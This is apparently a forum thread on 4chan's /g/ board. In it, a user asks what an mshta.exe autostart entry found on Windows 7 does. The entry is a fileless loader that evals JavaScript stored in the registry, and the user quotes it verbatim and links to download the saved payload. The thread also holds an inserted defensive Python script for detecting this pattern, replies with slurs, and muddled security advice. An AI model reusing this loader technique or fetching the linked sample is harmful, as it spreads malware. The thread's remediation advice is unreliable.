Thread replies: 17
Thread images: 2

File: warning.jpg (37KB, 497x197px)
Hello /g/, I have something which might interest you.
Recently this link showed in my Autostart folder (it's Windows 7):
C:\Windows\system32\mshta.exe "javascript:rCc94e="r";K8d=new ActiveXObject("WScript.Shell");Y6eEC0="lyI6mn";Kbvy6=K8d.RegRead("HKCU\\software\\lkxbln\\ruirnfsd");EXipXG4s="gJnaK";eval(Kbvy6);UTb2tk="CtA";"
It was not very annoying, but I suspected it to be a virus, and dealt with it by removing the link from Autostart folder, as well as deleting the registry entry. Before deleting, though, I looked at what was inside the registry value. It was a very obfuscated (49 KB) Javascript code, which is beyond my reach. There were also 7 other keys in the entry.
I saved the registry entry outside and removed it from the registry.
Here you can find the registry entry if you are interested: https:||filetea.me|t1sCxAzwdpPSGq9H0FGmmvWQQ (ofc, deal with care)
What does the command do? Is it dangerous?
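
An added triage example, not part of the original post: it checks an autostart command line for the pattern shown above (mshta.exe given an inline script that reads a registry value and passes it to eval) and reports which registry value holds the code that actually runs. The function name and the two extra sample commands are constructed for illustration.

```python
import re

# Script URL schemes that mshta.exe executes straight from its command-line argument.
SCHEMES = ("javascript:", "vbscript:")
# var = obj.RegRead("HIVE\\key\\value")  -> captures the variable and the quoted path
ASSIGN_RE = re.compile(r"""(\w+)\s*=\s*\w+\.RegRead\(\s*(["'])(.+?)\2\s*\)""", re.I)
# eval(var) -> captures the variable whose contents get executed
EVAL_RE = re.compile(r"\beval\(\s*(\w+)\s*\)", re.I)


def triage_autostart(command):
    """Flag an autostart command that runs inline script through mshta.

    Returns None when the rule does not match, otherwise a dict listing the
    registry values the script reads and which of them are passed to eval().
    """
    lowered = command.lower()
    scheme = next((s for s in SCHEMES if s in lowered), None)
    if "mshta" not in lowered or scheme is None:
        return None
    # Doubled backslashes are script-string escapes; undo them to get the real path.
    reads = {var: path.replace("\\\\", "\\")
             for var, _quote, path in ASSIGN_RE.findall(command)}
    evaluated = set(EVAL_RE.findall(command))
    return {
        "scheme": scheme.rstrip(":"),
        "registry_reads": sorted(reads.values()),
        # Values whose data is executed: the real payload lives here, not on disk.
        "payload_values": sorted(p for v, p in reads.items() if v in evaluated),
    }


# The first entry is the command quoted in the post; the other two are constructed.
SAMPLES = [
    r'''C:\Windows\system32\mshta.exe "javascript:rCc94e="r";K8d=new ActiveXObject("WScript.Shell");Y6eEC0="lyI6mn";Kbvy6=K8d.RegRead("HKCU\\software\\lkxbln\\ruirnfsd");EXipXG4s="gJnaK";eval(Kbvy6);UTb2tk="CtA";"''',
    r'"C:\Program Files\Example\updater.exe" /background',
    r'C:\Windows\system32\mshta.exe C:\tools\dashboard.hta',
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(triage_autostart(cmd), "<-", cmd[:60])
```

The `payload_values` entry names the registry value to export for analysis and to delete together with the autostart link, since the link itself only carries the loader.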
>>
Did the file expire? Alternate link:
https: filetea.me t1sDlOc2qd2S8eCaDoM9H8n7w
>>
>>57044000

what the fuck is filetea? pastebin that shit nigger or get out
>>
>>57044072
I can't pastebin the registry file.
I mean, I can copy paste contents to a txt, but I noticed that by doing so I lose information from one key (only the beginning 16 or so characters were being copied, and the key is like 30 kB in size).
If filetea isn't good, where should I upload the registry file?
>>
>>57044298
Zippyshare
>>
>>57044317
Okay, done.
http://www35.zippyshare.com/v/WyxMaek8/file.html
>>
>>57044399
Downloaded it and now i can't find my wife or kids
>>
>>57044588
same
wtf i hate windows now
>>
File: ss (2016-10-12 at 18.41.29).png (356KB, 1041x704px)
>>57044399
Why do you think this is javascript again?
>>
>>57044633
Because of what I wrote in the first post
>C:\Windows\system32\mshta.exe "javascript:rCc94e="r";K8d=new ActiveXObject("WScript.Shell");Y6eEC0="lyI6mn";Kbvy6=K8d.RegRead("HKCU\\software\\lkxbln\\ruirnfsd");EXipXG4s="gJnaK";eval(Kbvy6);UTb2tk="CtA";"
>javascript
>>
>>57043963
>>57044000
Use pastebin or something or gtfo.

1. we aren't your personal tech support site
2. thinly veiled personal army request
3. why would YOU being infected interest ANY of us?
>>
>>57044781
>3. why would YOU being infected interest ANY of us?

came here to post this but you beat me to it

OP, it sucks to be taken over, we've all been there before.

Why do you think we're worried about you though? We aren't.
Install Ubuntu already you fag
>>
>>57043963
Also I'll say remove all .exe files from your backups.
You are only allowed to save images, music, movies, text files, any BASIC file type that I've forgotten, and also compressed archives not containing any not listed file formats.
Compressed archives that happen to contain any files not listed as allowed to keep must be decompressed, all approved file types set aside with the rest of the backups, then after complete reinstall you can recompress them.

You need to reinstall from a disc, not a recovery partition or flash media, that is a retarded meme and is not secure.

You are now allowed to keep .pdf files, any of the million executable types, any java files that are not source code, etc.

You are not allowed to keep drivers or firefox-installer.exe, they could be contaminated. You either need to get the checksum of it and compare it to the site for each download, or simply just redownload it after the reinstall, if you're not retarded you'd just redownload it.

any .iso file could become contaminated, do not keep them any more either.
>>
>>57044824
>>57044781
I might have worded it a bit wrong.
I don't know if it is a virus. If it did not blatantly show up in the Autostart folder, I'd probably ignore it and would not notice its existence.
I don't care if you care, are interested or worried about me.
I have posted all of this because I thought that maybe someone (with spare time and knowledge) would be interested in solving and deciphering the code in the post. If no one is, it's fine too.
>>
>>57045090
do this >>57045115
and see if it comes back.

But first, do a scan with Malwarebytes, and upload C:\Windows\system32\mshta.exe to virustotal.com
does it show up in msconfig?
>>
>>57045166
>>57045090
Thank you for tips about what to do when a computer gets infected. I know (mostly) what to do about the infection though. I simply don't care - if my computer gets badly damaged by viruses, I'll simply wipe everything and reinstall the system. I don't have any important files on it, so I'm not worried about any data loss, data malformation and such. I don't send any files to the internet besides occasional jpegs, too.
I just wanted to know what is in the script contained in the link and the registry file.
>>
>>57045384
you'd need an autist crypto fag that is bored to help you with that one.
also, you are aware that the main line of defense against viruses is your router, and that once a computer in the network is infected it can freely contact the other computers in the network and scan for vulnerabilities that otherwise wouldn't be exposed.. right?

tldr, you know it could potentially send viruses to other computers without too much trouble, right?